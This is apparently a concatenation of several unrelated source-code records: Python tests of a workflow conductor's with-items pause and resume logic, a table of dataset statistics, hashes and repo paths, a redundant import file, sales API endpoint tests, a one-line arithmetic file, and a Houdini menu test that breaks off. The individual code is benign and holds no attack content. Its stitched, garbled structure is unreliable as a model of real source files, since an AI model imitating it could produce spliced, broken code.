    for item_id in range(len(task_ctx['xs'])):
        ac_ex_event = events.ActionExecutionEvent(
            states.SUCCEEDED, task_ctx['xs'][item_id], context={'item_id': item_id})
        conductor.update_task_flow(task_name, ac_ex_event)

    # The task completed, but the workflow honors the pause request.
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.SUCCEEDED)
    self.assertEqual(conductor.get_workflow_state(), states.PAUSED)

    # Resuming finds no remaining work, so the workflow completes.
    conductor.request_workflow_state(states.RESUMING)
    self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
def test_pause_workflow_using_pausing_state_with_items_concurrency(self):
    """Pause via PAUSING between item batches of a with-items task, then resume."""
    wf_def = """
    version: 1.0

    vars:
      - xs:
          - fee
          - fi
          - fo
          - fum

    tasks:
      task1:
        with:
          items: <% ctx(xs) %>
          concurrency: 2
        action: core.echo message=<% item() %>
        next:
          - publish:
              - items: <% result() %>

    output:
      - items: <% ctx(items) %>
    """

    concurrency = 2
    spec = specs.WorkflowSpec(wf_def)
    self.assertDictEqual(spec.inspect(), {})

    conductor = conducting.WorkflowConductor(spec)
    conductor.request_workflow_state(states.RUNNING)

    # Mock the action execution for each item and assert expected task states.
    task_name = 'task1'
    task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

    task_action_specs = [
        {'action': 'core.echo', 'input': {'message': msg}, 'item_id': idx}
        for idx, msg in enumerate(task_ctx['xs'])
    ]

    # Run the first batch of items (bounded by concurrency) to completion.
    mock_ac_ex_states = [states.SUCCEEDED, states.SUCCEEDED]
    expected_task_states = [states.RUNNING, states.RUNNING]
    expected_workflow_states = [states.RUNNING, states.RUNNING]

    self.assert_task_items(
        conductor,
        task_name,
        task_ctx,
        task_ctx['xs'],
        task_action_specs,
        mock_ac_ex_states,
        expected_task_states,
        expected_workflow_states,
        concurrency=concurrency
    )

    # The task stays staged because not all items have run yet.
    self.assertIn(task_name, conductor.flow.staged)

    # The workflow should still be running.
    self.assertEqual(conductor.get_workflow_state(), states.RUNNING)

    # Pause the workflow; with no items in flight the pause is immediate.
    conductor.request_workflow_state(states.PAUSING)
    self.assertEqual(conductor.get_workflow_state(), states.PAUSED)
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.PAUSED)

    # Resume the workflow.
    conductor.request_workflow_state(states.RESUMING)
    self.assertEqual(conductor.get_workflow_state(), states.RESUMING)

    # Verify the second batch of action executions.
    expected_task = self.format_task_item(
        task_name,
        task_ctx,
        conductor.spec.tasks.get_task(task_name),
        action_specs=task_action_specs[concurrency:],
        items_count=len(task_ctx['xs']),
        items_concurrency=concurrency
    )
    self.assert_task_list(conductor.get_next_tasks(), [expected_task])

    # Set the second batch of items to running state.
    for item_id in range(concurrency, len(task_ctx['xs'])):
        ac_ex_event = events.ActionExecutionEvent(
            states.RUNNING, context={'item_id': item_id})
        conductor.update_task_flow(task_name, ac_ex_event)

    # Task and workflow should both be running again.
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)
    self.assertEqual(conductor.get_workflow_state(), states.RUNNING)

    # Complete the second batch of items.
    for item_id in range(concurrency, len(task_ctx['xs'])):
        ac_ex_event = events.ActionExecutionEvent(
            states.SUCCEEDED, task_ctx['xs'][item_id], context={'item_id': item_id})
        conductor.update_task_flow(task_name, ac_ex_event)

    # All items are done; task and workflow complete.
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.SUCCEEDED)
    self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
def test_pause_workflow_using_paused_state_with_items_concurrency(self):
    """Pause via PAUSED between item batches of a with-items task, then resume."""
    wf_def = """
    version: 1.0

    vars:
      - xs:
          - fee
          - fi
          - fo
          - fum

    tasks:
      task1:
        with:
          items: <% ctx(xs) %>
          concurrency: 2
        action: core.echo message=<% item() %>
        next:
          - publish:
              - items: <% result() %>

    output:
      - items: <% ctx(items) %>
    """

    concurrency = 2
    spec = specs.WorkflowSpec(wf_def)
    self.assertDictEqual(spec.inspect(), {})

    conductor = conducting.WorkflowConductor(spec)
    conductor.request_workflow_state(states.RUNNING)

    # Mock the action execution for each item and assert expected task states.
    task_name = 'task1'
    task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

    task_action_specs = [
        {'action': 'core.echo', 'input': {'message': msg}, 'item_id': idx}
        for idx, msg in enumerate(task_ctx['xs'])
    ]

    # Run the first batch of items (bounded by concurrency) to completion.
    mock_ac_ex_states = [states.SUCCEEDED, states.SUCCEEDED]
    expected_task_states = [states.RUNNING, states.RUNNING]
    expected_workflow_states = [states.RUNNING, states.RUNNING]

    self.assert_task_items(
        conductor,
        task_name,
        task_ctx,
        task_ctx['xs'],
        task_action_specs,
        mock_ac_ex_states,
        expected_task_states,
        expected_workflow_states,
        concurrency=concurrency
    )

    # The task stays staged because not all items have run yet.
    self.assertIn(task_name, conductor.flow.staged)

    # The workflow should still be running.
    self.assertEqual(conductor.get_workflow_state(), states.RUNNING)

    # Pause the workflow; with no items in flight the pause is immediate.
    conductor.request_workflow_state(states.PAUSED)
    self.assertEqual(conductor.get_workflow_state(), states.PAUSED)
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.PAUSED)

    # Resume the workflow.
    conductor.request_workflow_state(states.RESUMING)
    self.assertEqual(conductor.get_workflow_state(), states.RESUMING)

    # Verify the second batch of action executions.
    expected_task = self.format_task_item(
        task_name,
        task_ctx,
        conductor.spec.tasks.get_task(task_name),
        action_specs=task_action_specs[concurrency:],
        items_count=len(task_ctx['xs']),
        items_concurrency=concurrency
    )
    self.assert_task_list(conductor.get_next_tasks(), [expected_task])

    # Set the second batch of items to running state.
    for item_id in range(concurrency, len(task_ctx['xs'])):
        ac_ex_event = events.ActionExecutionEvent(
            states.RUNNING, context={'item_id': item_id})
        conductor.update_task_flow(task_name, ac_ex_event)

    # Task and workflow should both be running again.
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)
    self.assertEqual(conductor.get_workflow_state(), states.RUNNING)

    # Complete the second batch of items.
    for item_id in range(concurrency, len(task_ctx['xs'])):
        ac_ex_event = events.ActionExecutionEvent(
            states.SUCCEEDED, task_ctx['xs'][item_id], context={'item_id': item_id})
        conductor.update_task_flow(task_name, ac_ex_event)

    # All items are done; task and workflow complete.
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.SUCCEEDED)
    self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
def test_pause_workflow_with_items_concurrency_and_active(self):
    """Pause a with-items task (concurrency=2) while the first batch is active."""
    wf_def = """
    version: 1.0

    vars:
      - xs:
          - fee
          - fi
          - fo
          - fum

    tasks:
      task1:
        with:
          items: <% ctx(xs) %>
          concurrency: 2
        action: core.echo message=<% item() %>
        next:
          - publish:
              - items: <% result() %>

    output:
      - items: <% ctx(items) %>
    """

    concurrency = 2
    spec = specs.WorkflowSpec(wf_def)
    self.assertDictEqual(spec.inspect(), {})

    conductor = conducting.WorkflowConductor(spec)
    conductor.request_workflow_state(states.RUNNING)

    # Mock the action execution for each item and assert expected task states.
    task_name = 'task1'
    task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

    task_action_specs = [
        {'action': 'core.echo', 'input': {'message': msg}, 'item_id': idx}
        for idx, msg in enumerate(task_ctx['xs'])
    ]

    # Verify the first batch of action executions (bounded by concurrency).
    expected_task = self.format_task_item(
        task_name,
        task_ctx,
        conductor.spec.tasks.get_task(task_name),
        action_specs=task_action_specs[0:concurrency],
        items_count=len(task_ctx['xs']),
        items_concurrency=concurrency
    )
    self.assert_task_list(conductor.get_next_tasks(), [expected_task])

    # Set the first batch of items to running state.
    for item_id in range(concurrency):
        ac_ex_event = events.ActionExecutionEvent(
            states.RUNNING, context={'item_id': item_id})
        conductor.update_task_flow(task_name, ac_ex_event)

    # The task should now be running.
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)

    # Request a graceful pause while items are in flight.
    conductor.request_workflow_state(states.PAUSING)
    self.assertEqual(conductor.get_workflow_state(), states.PAUSING)
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.PAUSING)

    # Complete the in-flight items.
    for item_id in range(concurrency):
        ac_ex_event = events.ActionExecutionEvent(
            states.SUCCEEDED, task_ctx['xs'][item_id], context={'item_id': item_id})
        conductor.update_task_flow(task_name, ac_ex_event)

    # Once the active items finish, the task and workflow settle to PAUSED.
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.PAUSED)
    self.assertEqual(conductor.get_workflow_state(), states.PAUSED)

    # Resume the workflow.
    conductor.request_workflow_state(states.RESUMING)
    self.assertEqual(conductor.get_workflow_state(), states.RESUMING)

    # Verify the second batch of action executions.
    expected_task = self.format_task_item(
        task_name,
        task_ctx,
        conductor.spec.tasks.get_task(task_name),
        action_specs=task_action_specs[concurrency:],
        items_count=len(task_ctx['xs']),
        items_concurrency=concurrency
    )
    self.assert_task_list(conductor.get_next_tasks(), [expected_task])

    # Set the second batch of items to running state.
    for item_id in range(concurrency, len(task_ctx['xs'])):
        ac_ex_event = events.ActionExecutionEvent(
            states.RUNNING, context={'item_id': item_id})
        conductor.update_task_flow(task_name, ac_ex_event)

    # Task and workflow should both be running again.
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)
    self.assertEqual(conductor.get_workflow_state(), states.RUNNING)

    # Complete the second batch of items.
    for item_id in range(concurrency, len(task_ctx['xs'])):
        ac_ex_event = events.ActionExecutionEvent(
            states.SUCCEEDED, task_ctx['xs'][item_id], context={'item_id': item_id})
        conductor.update_task_flow(task_name, ac_ex_event)

    # All items are done; task and workflow complete.
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.SUCCEEDED)
    self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
def test_pending_item(self):
    """A single PENDING item pauses the with-items task and then the workflow."""
    wf_def = """
    version: 1.0

    vars:
      - xs:
          - fee
          - fi
          - fo
          - fum

    tasks:
      task1:
        with: <% ctx(xs) %>
        action: core.echo message=<% item() %>
        next:
          - publish:
              - items: <% result() %>

    output:
      - items: <% ctx(items) %>
    """

    spec = specs.WorkflowSpec(wf_def)
    self.assertDictEqual(spec.inspect(), {})

    conductor = conducting.WorkflowConductor(spec)
    conductor.request_workflow_state(states.RUNNING)

    # Mock the action execution for each item and assert expected task states.
    task_name = 'task1'
    task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

    task_action_specs = [
        {'action': 'core.echo', 'input': {'message': msg}, 'item_id': idx}
        for idx, msg in enumerate(task_ctx['xs'])
    ]

    # Item 1 goes pending; the task behaves like the paused-item case.
    mock_ac_ex_states = [states.SUCCEEDED, states.PENDING, states.SUCCEEDED, states.SUCCEEDED]
    expected_task_states = [states.RUNNING, states.PAUSING, states.PAUSING, states.PAUSED]
    expected_workflow_states = [states.RUNNING, states.RUNNING, states.RUNNING, states.PAUSED]

    self.assert_task_items(
        conductor,
        task_name,
        task_ctx,
        task_ctx['xs'],
        task_action_specs,
        mock_ac_ex_states,
        expected_task_states,
        expected_workflow_states
    )

    # The task remains staged since one of the items did not complete.
    self.assertIn(task_name, conductor.flow.staged)

    # The workflow should be paused.
    self.assertEqual(conductor.get_workflow_state(), states.PAUSED)
def test_resume_pending_item(self):
    """Resuming a pending item resumes the task and completes the workflow."""
    wf_def = """
    version: 1.0

    vars:
      - xs:
          - fee
          - fi
          - fo
          - fum

    tasks:
      task1:
        with: <% ctx(xs) %>
        action: core.echo message=<% item() %>
        next:
          - publish:
              - items: <% result() %>

    output:
      - items: <% ctx(items) %>
    """

    spec = specs.WorkflowSpec(wf_def)
    self.assertDictEqual(spec.inspect(), {})

    conductor = conducting.WorkflowConductor(spec)
    conductor.request_workflow_state(states.RUNNING)

    # Mock the action execution for each item and assert expected task states.
    task_name = 'task1'
    task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

    task_action_specs = [
        {'action': 'core.echo', 'input': {'message': msg}, 'item_id': idx}
        for idx, msg in enumerate(task_ctx['xs'])
    ]

    mock_ac_ex_states = [states.SUCCEEDED, states.PENDING, states.SUCCEEDED, states.SUCCEEDED]
    expected_task_states = [states.RUNNING, states.PAUSING, states.PAUSING, states.PAUSED]
    expected_workflow_states = [states.RUNNING, states.RUNNING, states.RUNNING, states.PAUSED]

    self.assert_task_items(
        conductor,
        task_name,
        task_ctx,
        task_ctx['xs'],
        task_action_specs,
        mock_ac_ex_states,
        expected_task_states,
        expected_workflow_states
    )

    # The task remains staged since one of the items did not complete.
    self.assertIn(task_name, conductor.flow.staged)

    # The workflow should be paused.
    self.assertEqual(conductor.get_workflow_state(), states.PAUSED)

    # Resume the pending action execution for item 1.
    ac_ex_event = events.ActionExecutionEvent(states.RUNNING, context={'item_id': 1})
    conductor.update_task_flow(task_name, ac_ex_event)

    # Both the task and the workflow should be running again.
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)
    self.assertEqual(conductor.flow.staged[task_name]['items'][1]['state'], states.RUNNING)
    self.assertEqual(conductor.get_workflow_state(), states.RUNNING)

    # Complete the resumed action execution.
    ac_ex_event = events.ActionExecutionEvent(
        states.SUCCEEDED, result=task_ctx['xs'][1], context={'item_id': 1})
    conductor.update_task_flow(task_name, ac_ex_event)

    # All items are done, so the task is removed from staging.
    self.assertNotIn(task_name, conductor.flow.staged)

    # Both the task and the workflow succeeded.
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.SUCCEEDED)
    self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
def test_resume_partial(self):
    """Resuming one of two paused items leaves the task and workflow paused."""
    wf_def = """
    version: 1.0

    vars:
      - xs:
          - fee
          - fi
          - fo
          - fum

    tasks:
      task1:
        with: <% ctx(xs) %>
        action: core.echo message=<% item() %>
        next:
          - publish:
              - items: <% result() %>

    output:
      - items: <% ctx(items) %>
    """

    spec = specs.WorkflowSpec(wf_def)
    self.assertDictEqual(spec.inspect(), {})

    conductor = conducting.WorkflowConductor(spec)
    conductor.request_workflow_state(states.RUNNING)

    # Mock the action execution for each item and assert expected task states.
    task_name = 'task1'
    task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

    task_action_specs = [
        {'action': 'core.echo', 'input': {'message': msg}, 'item_id': idx}
        for idx, msg in enumerate(task_ctx['xs'])
    ]

    # Two items (1 and 2) are paused this time.
    mock_ac_ex_states = [states.SUCCEEDED, states.PAUSED, states.PAUSED, states.SUCCEEDED]
    expected_task_states = [states.RUNNING, states.PAUSING, states.PAUSING, states.PAUSED]
    expected_workflow_states = [states.RUNNING, states.RUNNING, states.RUNNING, states.PAUSED]

    self.assert_task_items(
        conductor,
        task_name,
        task_ctx,
        task_ctx['xs'],
        task_action_specs,
        mock_ac_ex_states,
        expected_task_states,
        expected_workflow_states
    )

    # The task remains staged since some items did not complete.
    self.assertIn(task_name, conductor.flow.staged)

    # The workflow should be paused.
    self.assertEqual(conductor.get_workflow_state(), states.PAUSED)

    # Resume only the paused action execution for item 1.
    ac_ex_event = events.ActionExecutionEvent(states.RUNNING, context={'item_id': 1})
    conductor.update_task_flow(task_name, ac_ex_event)

    # Both the task and the workflow should be running again.
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.RUNNING)
    self.assertEqual(conductor.flow.staged[task_name]['items'][1]['state'], states.RUNNING)
    self.assertEqual(conductor.get_workflow_state(), states.RUNNING)

    # Complete the resumed action execution for item 1.
    ac_ex_event = events.ActionExecutionEvent(
        states.SUCCEEDED, result=task_ctx['xs'][1], context={'item_id': 1})
    conductor.update_task_flow(task_name, ac_ex_event)

    # Item 2 is still paused, so the task remains staged.
    self.assertIn(task_name, conductor.flow.staged)

    # The task and workflow drop back to paused.
    self.assertEqual(conductor.flow.get_task(task_name)['state'], states.PAUSED)
    self.assertEqual(conductor.get_workflow_state(), states.PAUSED)
def test_task_cycle(self):
    """A failed with-items task that loops back to itself restages its items."""
    wf_def = """
    version: 1.0

    vars:
      - xs:
          - fee
          - fi
          - fo
          - fum

    tasks:
      init:
        next:
          - do: task1
      task1:
        with: <% ctx(xs) %>
        action: core.echo message=<% item() %>
        next:
          - when: <% failed() %>
            do: task1
    """

    spec = specs.WorkflowSpec(wf_def)
    self.assertDictEqual(spec.inspect(), {})

    conductor = conducting.WorkflowConductor(spec)
    conductor.request_workflow_state(states.RUNNING)

    # Complete the init task, required for bootstrapping the self-looping task.
    conductor.update_task_flow('init', events.ActionExecutionEvent(states.RUNNING))
    conductor.update_task_flow('init', events.ActionExecutionEvent(states.SUCCEEDED))

    # Mock the action execution for each item and assert expected task states.
    task_name = 'task1'
    task_ctx = {'xs': ['fee', 'fi', 'fo', 'fum']}

    task_action_specs = [
        {'action': 'core.echo', 'input': {'message': msg}, 'item_id': idx}
        for idx, msg in enumerate(task_ctx['xs'])
    ]

    # First pass: item 1 fails, which triggers the when-failed transition.
    mock_ac_ex_states = [states.SUCCEEDED, states.FAILED]
    expected_task_states = [states.RUNNING, states.FAILED]
    expected_workflow_states = [states.RUNNING, states.RUNNING]

    self.assert_task_items(
        conductor,
        task_name,
        task_ctx,
        task_ctx['xs'],
        task_action_specs,
        mock_ac_ex_states,
        expected_task_states,
        expected_workflow_states
    )

    # The task is restaged for the retry with its item records reset.
    self.assertIn(task_name, conductor.flow.staged)
    self.assertNotIn('items', conductor.flow.staged[task_name])

    # The workflow should still be running.
    self.assertEqual(conductor.get_workflow_state(), states.RUNNING)

    # Second pass: every item succeeds.
    mock_ac_ex_states = [states.SUCCEEDED] * 4
    expected_task_states = [states.RUNNING] * 3 + [states.SUCCEEDED]
    expected_workflow_states = [states.RUNNING] * 3 + [states.SUCCEEDED]

    self.assert_task_items(
        conductor,
        task_name,
        task_ctx,
        task_ctx['xs'],
        task_action_specs,
        mock_ac_ex_states,
        expected_task_states,
        expected_workflow_states
    )

    # All items are done, so the task is removed from staging.
    self.assertNotIn(task_name, conductor.flow.staged)

    # The workflow succeeded.
    self.assertEqual(conductor.get_workflow_state(), states.SUCCEEDED)
| 34.341223
| 99
| 0.566754
| 7,450
| 69,644
| 5.085906
| 0.025638
| 0.032515
| 0.047664
| 0.051148
| 0.975429
| 0.974716
| 0.972816
| 0.972816
| 0.965901
| 0.961019
| 0
| 0.00639
| 0.310134
| 69,644
| 2,027
| 100
| 34.358165
| 0.782246
| 0.09728
| 0
| 0.919048
| 0
| 0
| 0.242206
| 0
| 0
| 0
| 0
| 0
| 0.121088
| 1
| 0.018367
| false
| 0
| 0.003401
| 0
| 0.022449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
acf51b647b1cdf38270a34439e594bceba13426a
| 304
|
py
|
Python
|
models/reco/__init__.py
|
grsgth/Offline-Chinese-Handwriting-Text-Page-Spotter-with-Text-Kernel
|
00334215b63b12284a74e26fa0fbf15f09a046a2
|
[
"MIT"
] | 18
|
2021-05-10T04:10:44.000Z
|
2022-02-09T14:36:08.000Z
|
models/reco/__init__.py
|
grsgth/Offline-Chinese-Handwriting-Text-Page-Spotter-with-Text-Kernel
|
00334215b63b12284a74e26fa0fbf15f09a046a2
|
[
"MIT"
] | 4
|
2021-07-08T06:29:54.000Z
|
2021-08-02T08:51:01.000Z
|
models/reco/__init__.py
|
grsgth/Offline-Chinese-Handwriting-Text-Page-Spotter-with-Text-Kernel
|
00334215b63b12284a74e26fa0fbf15f09a046a2
|
[
"MIT"
] | 4
|
2021-12-14T02:39:20.000Z
|
2022-02-14T02:38:58.000Z
|
from .reco_layer_new_with_tcn_big import DenseNet as DenseNet_with_TCN_big
from .reco_layer_new_with_tcn_big import DenseNet as DenseNet_with_TCN_big
from .reco_layer_new_with_tcn_big import DenseNet as DenseNet_with_TCN_big
from .reco_layer_new_with_tcn_big import DenseNet as DenseNet_with_TCN_big
| 33.777778
| 74
| 0.894737
| 56
| 304
| 4.285714
| 0.178571
| 0.233333
| 0.333333
| 0.266667
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.092105
| 304
| 8
| 75
| 38
| 0.869565
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 14
|
c5cbde4b50482caaf94c4055ebf61dac8c42b2ae
| 7
|
py
|
Python
|
Theory/arithmetic_operators.py
|
wallaceleonel/Automatizando-
|
f8086f01f8c56041902b5f6b28accdac0f60ebe5
|
[
"MIT"
] | 1
|
2021-10-06T22:58:46.000Z
|
2021-10-06T22:58:46.000Z
|
Theory/arithmetic_operators.py
|
wallaceleonel/Automatizando-
|
f8086f01f8c56041902b5f6b28accdac0f60ebe5
|
[
"MIT"
] | 4
|
2021-09-24T16:03:28.000Z
|
2021-11-24T01:13:53.000Z
|
Theory/arithmetic_operators.py
|
wallaceleonel/Automatizando-
|
f8086f01f8c56041902b5f6b28accdac0f60ebe5
|
[
"MIT"
] | null | null | null |
5+3*2
| 3.5
| 6
| 0.428571
| 3
| 7
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.6
| 0.285714
| 7
| 1
| 7
| 7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c5dac561a9267017bd49c9798c21631ae094d9df
| 9,196
|
py
|
Python
|
app/tests/test_sales.py
|
waracci/store-manager-v2
|
c3d4c9a0eae389cbfb5e0fac9a2fc207c59972db
|
[
"MIT"
] | 2
|
2018-10-24T08:16:08.000Z
|
2021-09-29T20:28:00.000Z
|
app/tests/test_sales.py
|
waracci/store-manager-v2
|
c3d4c9a0eae389cbfb5e0fac9a2fc207c59972db
|
[
"MIT"
] | 4
|
2018-10-24T01:50:45.000Z
|
2019-10-21T17:25:08.000Z
|
app/tests/test_sales.py
|
waracci/store-manager-v2
|
c3d4c9a0eae389cbfb5e0fac9a2fc207c59972db
|
[
"MIT"
] | null | null | null |
import unittest
import json
from app.tests.base_test import BaseTest
class TestSales(BaseTest):
    """Sales Endpoints Test Suite.

    Each test needs an authenticated admin, a posted product, and a posted
    sale; that setup was previously copy-pasted verbatim into all four tests,
    so it is factored into private helpers here.  External behavior (requests
    made, assertions performed) is unchanged.
    """

    def _admin_token(self):
        """Register and log in an admin user; return the auth token."""
        self.user_authentication_register(
            email="mail1234@mail.com",
            password="password",
            confirm_password="password",
            role="admin",
        )
        login_response = self.user_authentication_login(
            email="mail1234@mail.com", password="password"
        )
        return json.loads(login_response.data.decode())['token']

    @staticmethod
    def _auth_header(token):
        """Build the Authorization header dict for *token*."""
        return dict(Authorization="Bearer {}".format(token))

    def _post_product(self, token):
        """POST the sample 'cake' product and assert it was created (201)."""
        product_posted = self.client().post(
            '/api/v2/products',
            content_type="application/json",
            headers=self._auth_header(token),
            data=json.dumps({
                "product_name": "cake",
                "product_description": "sweet and lovely",
                "product_quantity": 5,
                "product_price": 100,
                "product_category": "bakery",
                "product_minorder": 100,
            }),
        )
        result = json.loads(product_posted.data.decode())
        self.assertEqual(result['message'], 'Product cake added to inventory')
        self.assertEqual(product_posted.status_code, 201)

    def _post_sale(self, token):
        """POST a sale of one unit of product 1 and assert it is recorded (201)."""
        sales_posted = self.client().post(
            '/api/v2/sales',
            content_type="application/json",
            headers=self._auth_header(token),
            data=json.dumps({
                "product_quantity": 1,
                "product_id": 1,
            }),
        )
        result = json.loads(sales_posted.data.decode())
        self.assertEqual(result['status'], 'ok')
        self.assertEqual(sales_posted.status_code, 201)

    def test_user_can_post_sales(self):
        """Test that user can post sales"""
        token = self._admin_token()
        self._post_product(token)
        self._post_sale(token)

    def test_fetch_all_sales(self):
        """Test that user can retrieve all sales"""
        token = self._admin_token()
        self._post_product(token)
        self._post_sale(token)

        fetch_sales = self.client().get(
            '/api/v2/sales',
            headers=self._auth_header(token),
        )
        fetch_sales_data = json.loads(fetch_sales.data)
        self.assertEqual(fetch_sales.status_code, 200)
        self.assertEqual(fetch_sales_data['status'], 'ok')

    def test_fetch_single_sale(self):
        """Test that user can retrieve single sale"""
        token = self._admin_token()
        self._post_product(token)
        self._post_sale(token)

        fetch_sales_record = self.client().get(
            '/api/v2/sales/1',
            headers=self._auth_header(token),
        )
        self.assertEqual(fetch_sales_record.status_code, 200)

    def test_attendant_cannot_get_all_sales(self):
        """Test that attendant cannot get all sales"""
        token = self._admin_token()
        self._post_product(token)
        self._post_sale(token)

        # Switch to a non-admin (attendant) account; the sales record
        # endpoint should reject it with 406.
        self.user_authentication_register(
            email="attendant@mail.com",
            password="password",
            confirm_password="password",
            role="attendant",
        )
        login_response = self.user_authentication_login(
            email="attendant@mail.com", password="password"
        )
        attendant_token = json.loads(login_response.data.decode())['token']

        fetch_sales_record = self.client().get(
            '/api/v2/sales/1',
            headers=self._auth_header(attendant_token),
        )
        self.assertEqual(fetch_sales_record.status_code, 406)
| 62.557823
| 137
| 0.514028
| 790
| 9,196
| 5.781013
| 0.111392
| 0.065689
| 0.057806
| 0.072258
| 0.925772
| 0.908474
| 0.869718
| 0.847821
| 0.836873
| 0.825049
| 0
| 0.019934
| 0.378099
| 9,196
| 146
| 138
| 62.986301
| 0.778633
| 0.01903
| 0
| 0.844262
| 0
| 0
| 0.166759
| 0
| 0
| 0
| 0
| 0
| 0.163934
| 1
| 0.032787
| false
| 0.081967
| 0.02459
| 0
| 0.065574
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
c5fe4aec8329561bdb382f66aa49f411438e101b
| 358
|
py
|
Python
|
test_addons/__init__.py
|
vishal180618/django-test-addons
|
35317b718ca6f3269ff3e1552e93796237022b58
|
[
"MIT"
] | 23
|
2015-07-28T17:27:44.000Z
|
2020-07-16T09:27:45.000Z
|
test_addons/__init__.py
|
hspandher/django-test-utils
|
3bb7d488062ebabb6acc95f51db6f0dcccc97bd5
|
[
"MIT"
] | 6
|
2015-08-02T19:21:40.000Z
|
2017-11-16T06:02:20.000Z
|
test_addons/__init__.py
|
hspandher/django-test-utils
|
3bb7d488062ebabb6acc95f51db6f0dcccc97bd5
|
[
"MIT"
] | 13
|
2015-07-28T17:40:58.000Z
|
2019-03-25T09:00:40.000Z
|
from .test_cases import (MongoTestCase, MongoLiveServerTestCase, SimpleTestCase, RedisTestCase, Neo4jTestCase, RedisMongoNeo4jTestCase, MongoRedisTestCase, APIRedisTestCase, APIMongoTestCase, APINeo4jTestCase, APIMongoRedisTestCase, APIRedisMongoNeo4jTestCase)
from .utils import EnhancedHttpRequest, TestViewMixin, ClearFileStorageMixin, ModifySessionMixin
| 119.333333
| 260
| 0.888268
| 23
| 358
| 13.782609
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.011905
| 0.061453
| 358
| 2
| 261
| 179
| 0.931548
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a866de909d7968a585799afb48f3af9c89c83e80
| 29,455
|
py
|
Python
|
tests/ui/menus/test_parmmenu.py
|
Hengle/Houdini-Toolbox
|
a1fd7d3dd73d3fc4cea78e29aeff1d190c41bae3
|
[
"MIT"
] | 136
|
2015-01-03T04:03:23.000Z
|
2022-02-07T11:08:57.000Z
|
tests/ui/menus/test_parmmenu.py
|
Hengle/Houdini-Toolbox
|
a1fd7d3dd73d3fc4cea78e29aeff1d190c41bae3
|
[
"MIT"
] | 11
|
2017-02-09T20:05:04.000Z
|
2021-01-24T22:25:59.000Z
|
tests/ui/menus/test_parmmenu.py
|
Hengle/Houdini-Toolbox
|
a1fd7d3dd73d3fc4cea78e29aeff1d190c41bae3
|
[
"MIT"
] | 26
|
2015-08-18T12:11:02.000Z
|
2020-12-19T01:53:31.000Z
|
"""Tests for ht.ui.menus.parmmenu module."""
# =============================================================================
# IMPORTS
# =============================================================================
# Third Party
import pytest
# Houdini Toolbox
import ht.ui.menus.parmmenu
# Houdini
import hou
# =============================================================================
# TESTS
# =============================================================================
class Test__valid_to_convert_to_absolute_reference:
    """Test ht.ui.menus.parmmenu._valid_to_convert_to_absolute_reference."""

    def test_empty_string(self, mocker):
        """Test when the path is an empty string."""
        mock_template = mocker.MagicMock(spec=hou.StringParmTemplate)
